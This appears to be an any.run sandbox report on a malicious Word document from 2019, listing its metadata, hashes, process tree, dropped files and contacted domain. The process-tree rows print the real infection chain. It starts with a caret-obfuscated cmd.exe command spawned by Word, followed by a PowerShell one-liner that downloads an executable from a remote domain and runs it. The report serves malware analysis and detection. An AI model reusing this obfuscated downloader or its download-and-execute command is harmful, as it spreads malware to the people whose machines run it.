File name: | faisonconstruction.doc |
Full analysis: | https://app.any.run/tasks/4d1bc35f-a1d0-4ea2-b94b-102a5a6c79ae |
Verdict: | Malicious activity |
Analysis date: | May 24, 2019, 15:22:56 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Chase, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Sep 25 08:50:00 2018, Last Saved Time/Date: Tue Sep 25 08:50:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 20, Security: 0 |
MD5: | E1618EBD97A5654665985EE7040E5C05 |
SHA1: | 0302613603BE5EB44AF95DBF02B4815AACC08129 |
SHA256: | DE1A7AD6E314CD094B6F641E629C35DF99AC94EF3D9D537A24DBB2F24502D258 |
SSDEEP: | 3072:zte2dw99fEsVBqDOiEWcYgaG787syQIAjFop:BHdw7fVYqImg+ap |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | Chase |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:09:25 07:50:00 |
ModifyDate: | 2018:09:25 07:50:00 |
Pages: | 1 |
Words: | 3 |
Characters: | 20 |
Security: | None |
CodePage: | Windows Cyrillic |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 22 |
AppVersion: | 14 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | ???????? Microsoft Word 97-2003 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2688 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\faisonconstruction.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1472 | CMd /V^:^O/C"s^e^t @^+^`=^59^3^ 1^95^ 19^0^ ^103 0^35 ^9^3^0^ ^1^3^5 ^953^ ^9^10^ 5^30 951 ^5^03^ 5^90 ^190^ ^0^5^9 ^1^3^9^ 359 ^503^}^3^95^}90^1^{^15^3^h95^1c1^35^t5^10a^9^3^5c5^1^9^}^53^9^;^0^19^k^5^9^0^a^1^0^3e309r3^9^5b5^01;0^13R103^h5^3^0t905$^01^5^ 519m^19^3e9^51t519^I^5^90^-3^0^9^e03^5^k031^o^9^35v^135n31^0^I^5^09;^105)9^03R^9^50^h95^1t931^$351 ^3^09^,3^10^a3^1^9^w9^5^0^i^51^0$9^0^3(91^0e031^l^531i^59^3F1^9^0d^0^5^3^a^39^5o^59^0^l10^9n^9^50^w0^31o^190D^9^01.0^31h09^1^s591^z91^0$5^9^1{^0^1^3^y903r5^0^9t0^91{9^03)^059c91^0w^903I3^1^9^$^95^1^ 35^0n935i^19^5^ 93^1^a5^3^9w103^i5^3^0^$^01^9(5^31^h109c^90^5a^0^93e^0^9^3r^593^o^1^5^9^f^953^;901'95^3e^51^0x^90^1e^9^15^.3^9^5^'10^3^+^135^a^05^3^Z930M3^95$0^19^+^03^5'5^31^\590'^0^51^+3^0^5c0^5^9^i9^15^l^305b0^39^u1^95p^9^10:195v93^1n^019e^5^93^$3^90=^950R9^53h90^1^t^5^9^3^$^1^9^0;^9^3^0'31^57195^3^53^9'5^93^ 105^=3^05 1^93a0^35^Z3^10M^1^5^0$9^1^5;15^9)19^3'531^@03^1^'^0^9^1(^359^t^03^1i531l^5^30p^19^3^S35^1^.130'9^10^291^3t^9^53^x35^1.1^0^97039o0^5^1^j^359e^9^1^0r03^1=5^19l^139?^0^93p31^0h0^3^9p13^0^.^15^3s^15^9^o103p19^5d0^13o51^3l^5^1^0/1^35E^05^1^X^351M^93^1/3^5^9m3^0^1^o^1^3^0c359^.^19^3^q01^9p^3^09o^05^9w9^31^i^035^d^3^90^k9^10p^5^9^3a^0^35^o^9^3^5^e391^i^3^15q509o^910^w13^9^k^35^1j53^1^d9^53/^3^1^5/^9^1^0^:^3^9^1p^3^09t^0^1^5t153^h159'^1^03=350c0^19^w309I593$^530^;5^3^1t^019n9^0^5e^3^9^5i091l59^0C9^13^b091e135W3^05^.913^t59^1e03^9N^9^5^1^ ^05^1^t0^35c5^03^e^5^9^3j193b^1^93o0^9^3-139w^095^e^9^3^1n^5^3^0=3^15h3^91s3^50^z^31^9$^0^5^1^ 3^19^l^19^5l^01^3e^1^0^5^h5^0^3^s^150r^931e513^w15^9^o^1^39^p&&^f^or /^L %^t ^in (1^063^,^-4^,^3)^do ^s^et ^.*^'=!^.*^'!!@^+^`:~%^t,1!&&^i^f %^t ^le^q ^3 ca^l^l %^.*^':^~5%" | C:\Windows\system32\CMd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3972 | powershell $zsh=new-object Net.WebClient;$Iwc='http://djkwoqieoapkdiwopq.com/MXE/lodpos.php?l=rejo7.xt2'.Split('@');$MZa = '37';$thR=$env:public+'\'+$MZa+'.exe';foreach($iwa in $Iwc){try{$zsh.DownloadFile($iwa, $thR);Invoke-Item $thR;break;}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | CMd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2688 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4058.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3972 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GX4B8RYH0PCDUIE84Z9P.temp | — | |
MD5:— | SHA256:— | |||
2688 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:8CF4B99D86AD2C91E25F7D921404AF08 | SHA256:C71FCB563A60568ED4A3CC029F6FC631E9786D0AACFDB401A8DB9FE46803F35F | |||
3972 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF134b74.TMP | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
3972 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
2688 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$isonconstruction.doc | pgc | |
MD5:301D0595EC169D51F4CD01F19AB4330E | SHA256:7344AC1F01B50D076C57C3AC8612ECA7D7FBC723F9412A72C0C6FE5E503EF407 |
Domain | IP | Reputation |
---|---|---|
djkwoqieoapkdiwopq.com |
| suspicious |